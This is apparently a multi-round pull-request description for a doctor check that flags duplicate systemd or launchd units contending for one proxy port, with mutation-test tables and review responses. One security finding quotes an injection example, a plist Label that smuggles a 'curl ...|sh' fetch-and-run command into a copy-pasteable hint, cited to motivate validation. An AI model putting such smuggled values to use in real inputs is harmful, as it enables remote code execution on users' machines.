Fixed with `sys.stdout.reconfigure(errors="replace")`: verified under the exact same failing environment that the glyph now degrades to `?` instead of raising, the marker is reached, and exit is 0. New test extracts the REAL current block from `ocp` (not a hand-copied snippet) and re-runs it under the identical failing environment to prove the fix against the actual shipped file.

### LOW-3 — folded in: non-systemd Linux hosts got perpetual, unactionable INFO noise

The check didn't distinguish "systemctl is absent — this check cannot apply here" (a container, WSL without systemd, OpenRC) from "systemctl is present but this specific probe failed" — both produced "unknown", meaning a non-systemd Linux host printed an INFO line on every single `ocp update`, forever, about a check that could never work there.

Verified the real signal before using it: `execSync` given a full command STRING (this file's convention throughout) resolves a missing binary through the `/bin/sh` it spawns via, which exits **127** with "command not found" on stderr — NOT a Node-level `ENOENT` on the `execSync` call itself (confirmed directly). Fixed: a new `isCommandNotFound(err)` helper checks `err.status === 127`; `gatherUnitCandidates` tracks this per scope and only declares `systemctlNotFound` when **BOTH** scopes fail that specific way (an asymmetric failure — one 127, one something else — stays "unknown", a stranger shape not confidently "not-applicable"); `classifyMultiUnitRisk` returns a new, distinct `"not-applicable"` state, silent like `"clear"` rather than an INFO push. Five new tests cover both layers plus the asymmetric-failure edge case specifically.

### Mutation table — round 4 (response to review)

Same protocol: mutate a working copy, run the suite, confirm an actionable failure, restore from the file backup, `diff`-verify byte-identical, confirm green, before the next mutation.

| # | Mutation | Test(s) that caught it | Result |
|---|---|---|---|
| 1 | Required fix: remove the system-domain `print-disabled` spawn (gather layer) | `gatherUnitCandidates (macOS): issues launchctl print-disabled reads for BOTH...` | caught — "exactly two print-disabled reads" |
| 2 | Required fix: drop the union, revert `classifyMultiUnitRisk` to gui-domain-only (classify layer) | `review round 4 (#230 false-claim correction): a unit disabled ONLY in the SYSTEM domain...` | caught |
| 3 | LOW-2: remove `sys.stdout.reconfigure(errors="replace")` from `ocp` | `LOW-2 (real shell, verified mechanism): ocp's doctor-check-surfacing block survives...` | caught — via the test's own anchor-drift guard (`assert block.includes("reconfigure")`) |
| 4 | LOW-3: `isCommandNotFound` → always `true` (over-eager) | 2 tests (asymmetric-failure guard + MED-5 non-127 case) | caught by both |
| 5 | LOW-3: `userNotFound && systemNotFound` → `\|\|` (either instead of both) | `LOW-3: gatherUnitCandidates — systemctlNotFound requires BOTH scopes...` | caught |
| 6 | LOW-3: remove the `"not-applicable"` branch entirely from `classifyMultiUnitRisk` | 3 tests (classify-level, gather-level, and full `runDoctor` level) | caught by all three |

Two additional real-mechanism verifications (not source mutations, but the same "prove it before and after" discipline this round's lesson demands): the LOW-1 guard was proven to fire on an injected bad escape and stay silent on the real file; the LOW-2 fix was proven to survive the exact failing environment that broke the pre-fix block.

Restore protocol unchanged: `cp` the pristine backup over the mutated file, `diff` byte-identical, full suite green, before the next mutation. Final `git status` / `grep -n "MUTATION"` across all three files shows a clean, purely additive diff.

### Suite count

```
npm test 2>&1 | tail -3
=== Results: 570 passed, 0 failed ===
```
(562/526 at round 3 → +44 this round: 6 for the required correction, 4 for LOW-1/LOW-2 combined, 5 for LOW-3, plus the renamed/adjusted MED-5 test counted once.)


### Post-approval CI portability fix (not a review finding — self-caught)

The LOW-2 mechanism test initially forced the failure via `env -i LC_ALL=C` (a full environment wipe). That passed locally on macOS but failed on this repo's own Linux CI runner twice, for two different environment-portability reasons rather than the bug under test: first, `env -i` stripped `PATH` along with the locale, and the Linux runner's fallback search path didn't cover `bash`/`python3`; after fixing that (keeping `PATH`, only overriding locale variables), the *locale itself* still behaved differently between macOS and that Linux distro's libc, so the test still didn't reproduce the encoding failure there. Final fix: `PYTHONIOENCODING=ascii`, which CPython's IO layer reads directly and applies identically on every platform, independent of OS locale/libc — the actual mechanism the bug depends on, with the locale-dependent path removed as an unnecessary proxy for it. Re-verified both directions (throws pre-fix, passes post-fix) before each switch; all CI checks green on the final push.

---

## Round 3 status (superseded in one spot by round 4 above, otherwise still accurate)

## Status: responding to independent review, round 3 (Iron Rule 10 record)

Round 2 was independently mutation-proven by the reviewer — all 15 rows held, including the honest "survived" row, and a live macOS re-run confirmed the `/Library/LaunchAgents` scan for real (`plistBlob` 21,130 → 32,264 bytes), 4×concurrent 529/529. Round 3 found two new BLOCKING issues one level deeper than round 2's fixes, a "definitive answer" (no live bug, but a zero-cost tightening recommended), and several discretionary items. This section is the round-3 delta; round 2's own delta (HIGH-1/HIGH-2/MED-3 through MED-7/false-claim fixes) follows below it, unchanged and still accurate.

### BLOCKING — HIGH-2 recurs one level down, on the properties the HIGH-2 fix itself introduced (fixed)

Round 2's own new test asserted `--state=enabled` on the **listing** commands — correct — then captured the **show** command three lines later and asserted nothing about its contents. Three mutations survived: drop `-p UnitFileState`, drop `-p EnvironmentFiles`, drop the bare `-p Environment` (while keeping `-p EnvironmentFiles`). Losing `-p UnitFileState` is the worst: `props.UnitFileState` becomes `undefined`, the allowlist's documented "permissive when absent" fires, and the HIGH-2 defense-in-depth gate this round exists to add evaporates — back to the single point of failure (`--state=enabled` alone) round 2 was supposed to remove. Losing the bare `-p Environment` is worse still under MED-7's port-only grouping: every OCP unit falls back to port 3456 / `(default bind)`, collapsing every OCP unit on the host into one WARN with a fabricated bind difference.

Fixed: `extractShowProperties()` tokenizes the show command and checks **exact property-name membership** in the resulting token array — not a substring match. A substring check (`cmd.includes("-p Environment")`) would itself be vacuous here: that 14-character string is a literal **prefix** of `"-p EnvironmentFiles"`, so it stays true even if the bare flag is deleted outright as long as `-p EnvironmentFiles` remains — the same shape as round 2's own `/Library/LaunchAgents` vacuous-substring catch. All three mutations now caught with actionable messages.

### BLOCKING — the INFO push never reached `ocp update` (fixed)

Verified directly against `origin/main` (not a stale local checkout — my own prior stale checkout at `a17b6c0` briefly led me to conclude the WARN filter didn't exist, corrected before this fix): `ocp`'s own doctor-check-surfacing block (`ocp:~800-822`) filtered on `level == 'WARN'` only. So doctor.mjs's `multi_unit_boot_race` INFO line reached `ocp doctor` (whose text-mode printer prints every check regardless of level) but never `ocp update` — the exact #214 discarded-check shape recurring one level up, on the very fix meant to make "unknown" externally visible. The PR body's own MED-5 write-up ("`sudo ocp update` on a host whose OCP is a SYSTEM unit ... silently degraded this whole check") named `ocp update` as the path, but the fix only reached `ocp doctor`.

Fixed: the embedded python block now branches on `level in ('WARN', 'INFO')`, each with its own glyph (WARN keeps ⚠, INFO gets ℹ, kept visually distinct). Verified with the same anchor-slice-and-exec technique the existing ocp-connect harnesses in `test-features.mjs` already use (slice the **real** bash-embedded python between two textual anchors, assert the slice isn't vacuous/overgrown, then `exec` it against caller-supplied JSON) — adapted for the one structural difference: this block lives inside a bash **double-quoted** `python3 -c "..."` argument, not ocp-connect's **quoted heredoc** (`<<'PYEOF'`), so it needs `\"` → `"` reversed before the slice is valid standalone python (bash performs that unescaping before python3 ever sees the argument; the test reverses it explicitly rather than reconstructing the logic in JS). Four new tests: WARN still surfaces (regression guard), INFO now surfaces (the fix), PASS/FAIL still don't print, and both WARN+INFO print together correctly ordered around an intervening PASS.

### Definitive answer — `LAUNCHD_LABEL_RE` permitting a leading `-` (no live bug; tightened anyway, at zero cost)

Reviewer confirmed this is **structurally neutralized** today: the label is always the trailing component of a `<domain>/<label>` token (`buildDisableHint`'s two format strings), the regex already excludes `/` (can't break out of the token) and whitespace (can't split into extra words) — rendered both ways, a label like `-Hattacker@example.com` stays inert. That guarantee lives in the **rendering**, not the **validator**, though — a future rendering (e.g. a bare `launchctl bootout <label>` with no `domain/` prefix) would reopen it. Since rejecting a leading `-` costs nothing (no real launchd label starts with one), tightened `LAUNCHD_LABEL_RE` to exclude it from the first character, with a comment explaining exactly this — the guarantee now doesn't depend on the rendering detail at all. New test + mutation-proven.

### Discretionary (all reviewer-verified) — addressed

- **MED-7's remediation didn't adapt to the different-tree case.** The message correctly said the trees differ, but still said "disable the stray one — e.g. `systemctl --user disable ocp-proxy.service`", nominating the user-scope unit — a judgement this check has no basis for when the two units are genuinely separate installs, and one that directly contradicted this PR's own stated "does not assert which unit is correct" principle. `PICK_always_first` survived, confirming the user-scope preference itself was untested. Fixed: `buildNeutralDisableHint()` lists **every** unit's own disable command and nominates none, used only when working trees differ; the same-tree case (the field incident's own shape, where the check does have a reasonable basis) still nominates via the existing `buildDisableHint()`. Added a `PICK_always_first` regression test with the gather order deliberately reversed (every prior fixture happened to gather the user-scope unit first, matching real listing/glob order, so "prefer user scope" and "just take `group[0]`" could never diverge until now) and a same-tree-still-nominates regression test.
- **New LOW false-positive the regroup makes reachable** (two units on distinct, specific, non-wildcard binds — e.g. `127.0.0.1:3456` vs `192.168.1.5:3456` — don't actually contend, but now WARN under port-only grouping). Documented as a deliberate, accepted limitation in the module comment (WARN-only, never FAIL) rather than adding untested bind-semantics inference, per the reviewer's own offered choice.
- **`enabled-runtime` is inert/mildly self-contradictory** (unreachable via the exact-match `--state=enabled` listing filter today; doesn't survive reboot, so admitting it as an "would start at boot" allowlist entry is looser than the check's own framing). Documented in the allowlist's own comment — kept deliberately (a runtime-enabled unit can still be racing another enabled unit for the port *right now*), not removed, since removal has zero present-day effect either way (dead code today) and future-proofs a broader listing filter.
- **`DOMAIN_always_gui` was untested** (the reviewer rendered the `sudo launchctl disable system/<label>` branch by hand to confirm the code was right; no test exercised it). Added a test with two conflicting LaunchDaemons (no LaunchAgent involved), the only way to reach that branch.

### Confirmed good, no action (per reviewer's own findings)

The `/Library/LaunchAgents` mutation is caught by the *correct* space-anchored assertion. HIGH-1's fix introduced no new vacuity. The allowlist can only tighten, and "permissive when absent" is not exploitable in production (`list-unit-files` only enumerates units that have a unit file) — provided `-p UnitFileState` stays in the show command, which is exactly what this round's fix locks down. Test-count decomposition (485/449 → 510/474 → 529/493) independently re-measured and confirmed correct. `launchctl print-disabled` implementation verified against 52 live labels / 38 real plist labels, zero false rejections.

### Mutation table — round 3 (response to review)

Same protocol: mutate a working copy, run the suite, confirm an actionable failure, restore from the file backup, `diff`-verify byte-identical, confirm green, before the next mutation.

| # | Mutation | Test(s) that caught it | Result |
|---|---|---|---|
| 1 | `[UFS_drop_p_UnitFileState]`: remove `-p UnitFileState` from both show commands | `HIGH-1/HIGH-2: gatherUnitCandidates batches ALL candidates...` | caught — "user-scope show command must request -p UnitFileState (exact token match)" |
| 2 | `[EF_drop_p_EnvironmentFiles]`: remove `-p EnvironmentFiles` | same test | caught — "...must request -p EnvironmentFiles (exact token match)" |
| 3 | `[E_drop_p_Environment]`: remove bare `-p Environment` (keeping `-p EnvironmentFiles`) | same test | caught — "...must request -p Environment (exact token match)" — correctly NOT vacuously passed by the retained `-p EnvironmentFiles` |
| 4 | MED-5: remove the `elif level == 'INFO'` branch from `ocp`'s embedded python | all 4 new `ocp cmd_update` tests | caught — via the harness's own anchor-drift guard (`assert "'INFO' in blk"`), which fires as soon as the code shape changes |
| 5 | Definitive answer: revert `LAUNCHD_LABEL_RE` to permit a leading `-` | `review round 3 ('definitive answer'): a Label starting with '-' is rejected...` | caught |
| 6 | MED-7 remediation: revert `describeMultiUnitConflict` to always nominate via `buildDisableHint` even when trees differ | `MED-7: runDoctor — same port, DIFFERENT working tree...` | caught — "must not nominate a 'stray' unit when the trees genuinely differ" |
| 7 | `PICK_always_first`: `pickDisableTarget` → always `group[0]` | `PICK_always_first guard: pickDisableTarget prefers the user-scope unit...` | caught |
| 8 | `DOMAIN_always_gui`: `buildDisableCommand` → always `gui` domain on darwin | `DOMAIN_always_gui guard: two conflicting LaunchDaemons...` | caught |

Restore protocol unchanged: `cp` the pristine backup over the mutated file, `diff` byte-identical, full suite green, before the next mutation. Final `git status` / `grep -n "MUTATION"` across all three files shows a clean, purely additive diff.

### Suite count

```
npm test 2>&1 | tail -3
=== Results: 562 passed, 0 failed ===
```
(Base moved during this round — `main` gained an unrelated commit, #229, with its own tests. This PR's own additions: 529/493 at round 2 → +8 net this round, on top of whatever #229 added to the shared base.)

### Files touched this round

`scripts/doctor.mjs`, `test-features.mjs`, and — for the first time — `ocp` (the bash CLI wrapper; not `server.mjs`, so no `cli.js` citation applies, and `ALIGNMENT.md`'s Class A/B rules don't govern it either).

---

## Round 2 status (superseded in parts by round 3 above, otherwise still accurate)

## Status: responding to independent review (Iron Rule 10 record)

Review of this PR found two HIGH findings (a test-coverage gap that made two tests unable to fail, and an untested precondition string), two blockers (MED-3: a `systemctl` command printed on macOS + an unvalidated `<Label>` injected into a copy-pasteable command; MED-4: the macOS enumeration command silently no-op'd on an ordinary Mac), three "should-fix" items (MED-5, MED-6, MED-7), and two false prose claims in the original PR body. This revision addresses every item; the rest of this section is the delta. Original PR body follows below.

The review's "confirmed good, re-derived not trusted" section (the original 11-row mutation table, the WARN-not-FAIL rationale, the cost/measurement claims, the `setup.mjs` reading, the parser soundness) still stands — nothing there was touched.

### HIGH-1 — two tests could never fail (fixed)

`test-features.mjs`'s "batches ALL candidates" and "macOS single command" tests put `assert.ok(...)` **inside** the injected `run` fake. `gatherUnitCandidates` wraps every `run(...)` call in its own `try`/`catch`; a thrown `AssertionError` was silently swallowed there before it could reach the test framework, and the counters those tests then checked (`userShowCalls`, `calls`) had already been incremented before the throw. Proven with a deliberately-false assertion that did not propagate. Fixed: both tests now **capture** every command string into an array and assert on it **after** `gatherUnitCandidates` returns.

### HIGH-2 — untested `--state=enabled` precondition (fixed)

The entire "only ENABLED units are candidates" guarantee rested on a string literal in two listing commands that nothing ever asserted on. A control mutation deleting `--state=enabled` passed the whole suite. Fixed two ways:
1. A new assertion (enabled by HIGH-1's capture-then-assert pattern) checks the literal is present in both the user-scope and system-scope listing commands.
2. **Defense in depth**, per the reviewer's suggested fix, at zero extra spawn cost: the batched `systemctl show` call now also requests `-p UnitFileState`, and `fingerprintSystemdUnit` drops any candidate whose `UnitFileState` is present and not in an explicit allowlist (`enabled`, `enabled-runtime`) — permissive when the property is absent (older systemd, or a caller that didn't request it). A future refactor that silently drops `--state=enabled` from the listing command no longer widens this check's blast radius.

### MED-3 (blocker) — macOS prints a `systemctl` command; unvalidated `<Label>` injection (fixed)

Two problems in one finding:
- `describeMultiUnitConflict`'s disable-hint was hard-coded to `systemctl` wording regardless of platform — on macOS, where that binary doesn't exist, the WARN message was actionable nonsense.
- `parsePlistCandidates` took a unit's `name` straight from `<Label>` with no validation — same trust-boundary class as PR #221's MED-5 finding on `restart-unit.mjs` (a cgroup-derived string there; a plist-derived string here, equally attacker-creatable by anyone who can drop a file). A plist labelled `evil"; curl http://x/|sh #` rendered a quote-broken, copy-pasteable shell command in output that `README.md` tells users to hand to an AI agent.

Fixed: `buildDisableHint` is now platform- **and domain**-aware — `launchctl disable gui/$(id -u)/<label>` for a LaunchAgent (personal or system-wide-installed; launchd tracks LaunchAgent disable-overrides per logged-in-user session regardless of which directory installed the plist), `sudo launchctl disable system/<label>` for a LaunchDaemon. A new `LAUNCHD_LABEL_RE` (`^[A-Za-z0-9_.@-]+$` — permits real observed labels like `homebrew.mxcl.postgresql@17`, rejects shell metacharacters) drops the whole candidate if its Label fails validation, mirroring the Linux `Id` check exactly. New `runDoctor({ mockPlatform: "darwin" })` tests cover both — the review correctly noted **no test previously drove the full pipeline on darwin at all**; every macOS test stopped at `classifyMultiUnitRisk`.

### MED-4 (blocker) — macOS enumeration silently no-ops on a clean Mac (fixed)

Verified on this machine, exactly as the review demonstrated: `for f in <dir1>/*.plist <dir2>/*.plist; do [ -f "$f" ] && ...; done` — when the LAST glob in the list expands to nothing, the shell leaves it as a literal unmatched pattern, `[ -f "<literal>" ]` is false, and that false test's exit code becomes the whole for-loop's (and hence `execSync`'s) exit code. `execSync` throws on that and **discards** whatever stdout an earlier, successful iteration already produced. `/Library/LaunchDaemons` is normally empty on an ordinary Mac (Apple's own daemons live under `/System/Library`) — this was the **common** case, not an edge case, and the previous revision never scanned `/Library/LaunchAgents` at all (the standard location a package installer drops a system-wide agent — precisely the case named as the macOS risk).

Fixed: added `/Library/LaunchAgents` to the scan (classified as `system` scope for display, but still the `gui/<uid>` disable domain — see MED-3), terminated the command with `; :` (shell no-op, always exit 0) so the loop's own exit status can never determine the whole command's. Verification is two-layered:
- A **real-subprocess** test builds a scratch directory shaped exactly like the bug (one matching glob, one deliberately non-matching trailing glob) and proves the bare command throws while the fixed command (`; :` appended) doesn't and the earlier match's real output survives.
- A command-shape test asserts the **actual** command `gatherUnitCandidates` generates ends with the no-op.

**Bonus catch from mutation testing itself**: while mutation-proving the "`/Library/LaunchAgents` is scanned" fix, deleting it from the source **did not** fail the existing test — `plistCmds[0].includes("/Library/LaunchAgents")` is a vacuous substring check, trivially satisfied by the `$HOME`-prefixed personal path (`"$HOME/Library/LaunchAgents"` contains that exact substring) even with the standalone system-wide glob entirely removed. Fixed to a space-anchored check (`.includes(" /Library/LaunchAgents/")`) that only matches the standalone occurrence, then re-ran the same mutation to confirm it's now caught. Logged as its own row in the mutation table below.

### MED-5 — "unknown" invisible from outside the process (fixed)

`systemctl --user ...` fails without `XDG_RUNTIME_DIR`/`DBUS_SESSION_BUS_ADDRESS`, which is exactly what `sudo`'s `env_reset` strips — so `sudo ocp update` on a host whose OCP is a **system** unit (the #215 shape) silently degraded this whole check to "unknown", and "unknown" pushed nothing, indistinguishable from a genuinely clear host. Fixed: `runDoctor` now pushes a low-severity `INFO` check (`could not verify: <reason>`) on "unknown" — does not affect `fail_count`/`warn_count`/`ready_to_upgrade`, just makes the distinction externally visible.

### MED-6 — `EnvironmentFile=` not expanded (fixed)

`systemctl show -p Environment` reflects only literal `Environment=` directives, never `EnvironmentFile=` expansion. Assuming `DEFAULT_PORT` for a unit that might set its port via a file this check can't read would fabricate a port match (or mismatch) with no real evidence. Fixed: the batched show call also requests `-p EnvironmentFiles` (same call, zero extra cost); `fingerprintSystemdUnit` drops any candidate with a non-empty value, permissive when empty/absent.

### MED-7 — grouping narrowed beyond the stated requirement, undisclosed (fixed — took the "group on port alone" branch)

An earlier revision required **both** port and working tree to match before warning, reasoning from the single observed field-incident's shape (which happened to have both) rather than the literal text of #220 ("targets the OCP port") or #215 ("points at the same port") — and did so without flagging the narrowing as a narrowing. It was wrong on the merits, too: two units on the same port from **different** trees still race for the port and would serve **different code** to whoever wins — arguably worse than the field incident, not exempt from it, and a host in that state has two entirely separate installs nobody may even realize both auto-start.

Fixed: grouping is now by **port alone**. Working tree is retained per-unit and surfaced in the WARN message (`(same working tree: X)` vs `— DIFFERENT working trees (A vs B): different code may be racing for this port, not just different config`) to keep the diagnostic value without gating on it. This is a deliberate behavior change from the original PR — the "different directory → no false positive" test from the original task brief is superseded by this finding; the corresponding test now asserts a WARN instead, with the rationale spelled out in both the code comment and the test name.

### False-claim fixes

1. **Test count.** "509 pre-existing + 30 new" was wrong (also internally inconsistent: 509+30=539≠510). Verified directly: `git checkout` to base commit `16585cb` → 485 passed, `grep -c '^test('` → 449. This PR's prior head → 510 passed, 474 `test(` lines. Correct figure: **485 + 25 = 510**.
2. **`launchctl disable` overrides.** The original PR claimed checking this "would require knowing labels in advance — circular." False: `launchctl print-disabled gui/$(id -u)` dumps the **entire** override set in one read-only spawn, no labels needed — verified against this live host (format: `"<label>" => enabled|disabled`; 36 entries, several disabled, including confirmation that `dev.ocp.proxy` itself shows `enabled`). Rather than just correcting the prose, implemented it: `gatherUnitCandidates` now issues this as a second macOS spawn, and `classifyMultiUnitRisk` excludes any plist candidate found persistently disabled — a `RunAtLoad=true` plist that's been `launchctl disable`d is inert, so warning about it is a false positive, and `launchctl disable` is the actual persistent remediation a Mac operator would reach for. Best-effort: an unreadable `disabledBlob` degrades to "nothing filtered" (permissive), not "unknown" — `RunAtLoad=true` is already sufficient signal on its own; this is a refinement, not a requirement. Scoped to the `gui/<uid>` domain only (covers every LaunchAgent); a LaunchDaemon's disabled state lives in the `system` domain, which requires root to query — documented as a deliberate, out-of-scope limitation for a read-only, unprivileged probe.

### LOW items — addressed

- Cost cap untested on system scope → new symmetric test.
- Boundary off-by-one untested → new test at exactly `MAX_UNIT_CANDIDATES` (200, not capped) vs 201 (capped).
- macOS default-port path untested → new test.
- `RunAtLoad <false/>` untested (only key-absent was covered) → new test.
- False negatives from `static`/`generated`/`enabled-runtime` → `enabled-runtime` is now an explicit allowlist positive (tested); `static`/`generated`/etc. are excluded both by the primary `--state=enabled` listing filter and, per HIGH-2, by the `UnitFileState` defense-in-depth allowlist (tested).
- In-code comment cited `scripts/lib/restart-unit.mjs` as if it existed on `main` → reworded to "introduced on PR #221's branch, not yet on main as of this writing."
- Mutations B, O, R (reviewer's own testing, not in my table) are acknowledged as equivalent mutants per the reviewer's note — no action needed.

### Mutation table — round 2 (response to review)

Same protocol as round 1: mutate a working copy, run the suite, confirm an actionable failure, restore from the file backup, `diff`-verify byte-identical, confirm green, before the next mutation. All 15 caught (one — MED-4's `/Library/LaunchAgents` removal — first **survived** due to the vacuous-test bug above; fixed the test, re-ran the identical mutation, confirmed caught, logged both rows below).

| # | Mutation | Test(s) that caught it | Result |
|---|---|---|---|
| 1 | HIGH-1: `userNames.join(" ")` → `userNames[0]` (only probes the first candidate) | `HIGH-1/HIGH-2: gatherUnitCandidates batches ALL candidates...` | caught — "all three user-scope candidates must appear in the SAME show command" |
| 2 | HIGH-2: delete `--state=enabled` from both listing commands | same test | caught — "user-scope listing must request --state=enabled" |
| 3 | HIGH-2 defense-in-depth: remove the `UnitFileState` allowlist check | `HIGH-2: ... UnitFileState is NOT in the auto-start allowlist is excluded` | caught |
| 4 | MED-6: remove the `EnvironmentFiles` check | `MED-6: ... a candidate with a non-empty EnvironmentFiles is excluded` | caught |
| 5 | MED-7: revert grouping key to `${port}::${workingTree}` | `MED-7: classifyMultiUnitRisk — ... DIFFERENT working tree` + `MED-7: runDoctor — ...` | caught by both |
| 6 | MED-3: remove the darwin branch from `buildDisableHint` (always systemctl wording) | `MED-3: runDoctor on darwin — WARN message uses launchctl, NEVER systemctl` | caught |
| 7 | MED-3: remove `LAUNCHD_LABEL_RE` validation | `MED-3: classifyMultiUnitRisk (macOS) — a maliciously-crafted <Label>...` + darwin runDoctor test | caught by both |
| 8a | MED-4: remove `/Library/LaunchAgents` from the glob command | *(none — SURVIVED, vacuous substring check)* | **survived** — bug in the test, not the source |
| 8b | Same mutation, after fixing the vacuous assertion to a space-anchored check | `HIGH-1: gatherUnitCandidates (macOS) — a single shell command enumerates...` | caught — "must scan the STANDALONE /Library/LaunchAgents..." |
| 9 | MED-4: remove the trailing `; :` terminator | `MED-4: the actual darwin plist-enumeration command...ends with the no-op terminator` | caught |
| 10 | MED-5: remove the INFO push on "unknown" | `MED-5: runDoctor — systemctl missing entirely...` | caught |
| 11 | False-claim fix: remove the `disabledLabels` filter (print-disabled cross-check) | `classifyMultiUnitRisk (macOS): a persistently-disabled...unit is excluded` | caught |
| 12 | Domain distinction: tie `domain` to `scope` instead of `isDaemon` (wrong launchctl domain for `/Library/LaunchAgents`) | `MED-4: classifyMultiUnitRisk (macOS) — /Library/LaunchAgents...` | caught — "disable domain is gui/<uid>, NOT the system daemon domain" |
| 13 | Boundary: `> MAX_UNIT_CANDIDATES` → `>= MAX_UNIT_CANDIDATES` | `gatherUnitCandidates: EXACTLY at the MAX_UNIT_CANDIDATES boundary (200) is NOT capped` | caught |
| 14 | System-scope cap: check `userNames.length` instead of `systemNames.length` for the system-scope cap | `gatherUnitCandidates: the MAX_UNIT_CANDIDATES cap applies to the SYSTEM scope too` | caught |

Restore protocol: `cp` the pristine backup over the mutated file, `diff` the two (byte-identical every time), full suite green, before the next mutation. Final `git status`/`grep -n "MUTATION" scripts/doctor.mjs` after all rounds shows a clean, purely additive diff.

### Suite count

```
npm test 2>&1 | tail -3
=== Results: 529 passed, 0 failed ===
```
Base (`16585cb`): 485 passed / 449 `test(` lines. Round 1: +25 (→510/474). Round 2 (this revision): +19 (→529/493).

---

## Original PR body (round 1)

## The defect (live evidence from #215)

On a real host, two units were both `enabled`, both bound to the same OCP port, with drifted config:

| unit | bind | CLAUDE_BIN |
|---|---|---|
| `/etc/systemd/system/ocp.service` | `0.0.0.0` (LAN) | `~/.npm-global/bin/claude` |
| `~/.config/systemd/user/ocp-proxy.service` | `127.0.0.1` | `/usr/bin/claude` |

Whichever won the boot race silently decided the host's LAN reachability. It was found by hand while diagnosing an unrelated update failure — nothing in `ocp doctor` surfaced it. This PR adds that pre-flight check.

## Relationship to #221 (dependency decision)

PR #221 (open) fixes the **restart-time** half of #215: it resolves which unit *currently* owns the port from **live PID/cgroup state** (`ss`/`lsof` + `/proc/<pid>/cgroup`) so the upgrade restart phase targets the right one. This PR answers a different, **static** question — which units *would* start at boot, and do any two of them collide — by reading unit-file config (`systemctl show` ExecStart/Environment, or plist content on macOS), never a live PID.

**Decision: ships independently, does not depend on #221.** No logic is shared or duplicated — `scripts/lib/restart-unit.mjs` is never imported here, and this module never inspects a live process. Landing order between the two PRs doesn't matter.

## Design decisions (see "Status" section above for post-review updates to several of these)

**Enumeration.** Matching on unit *name* is fragile — instead, `systemctl list-unit-files --state=enabled` (both scopes) finds candidates, one batched `systemctl show` call per scope reads `ExecStart`/`Environment`/`UnitFileState`/`EnvironmentFiles` for all of them at once, and units are fingerprinted by whether `argv[]` actually invokes `server.mjs`.

**macOS/launchd.** `setup.mjs` only ever writes **one** LaunchAgent and never a LaunchDaemon — verified by reading `setup.mjs:416-517`. The precondition for this race is less likely to arise from OCP's own tooling on macOS than Linux, but not impossible, so this checks all three plist locations (`~/Library/LaunchAgents`, `/Library/LaunchAgents`, `/Library/LaunchDaemons`) rather than skipping the platform.

**WARN, never FAIL.** `scripts/upgrade.mjs`'s `runUpgrade()` pre-flight guard only tolerates `ready_to_upgrade=false` for `kind="fresh_install"`.

**Cost / graceful degradation.** Gated behind `opts.skipNetwork`. A missing/erroring `systemctl` (or unreadable plist enumeration) degrades to `"unknown"` (now visible via an INFO push — see MED-5 above) rather than a false all-clear or a crash.

`server.mjs` is **untouched** by this change — this PR only modifies `scripts/doctor.mjs` and `test-features.mjs`. No `cli.js` citation applies.

## Deferred / out of scope

- No change to `scripts/upgrade.mjs` or the restart phase — that's #221's territory.
- Does not assert which of two conflicting units is "correct" — names both, lets the operator decide.
- LaunchDaemon disabled-state cross-check requires the `system` domain (root-only query) — out of scope for a read-only, unprivileged probe; documented limitation, not a silent gap.



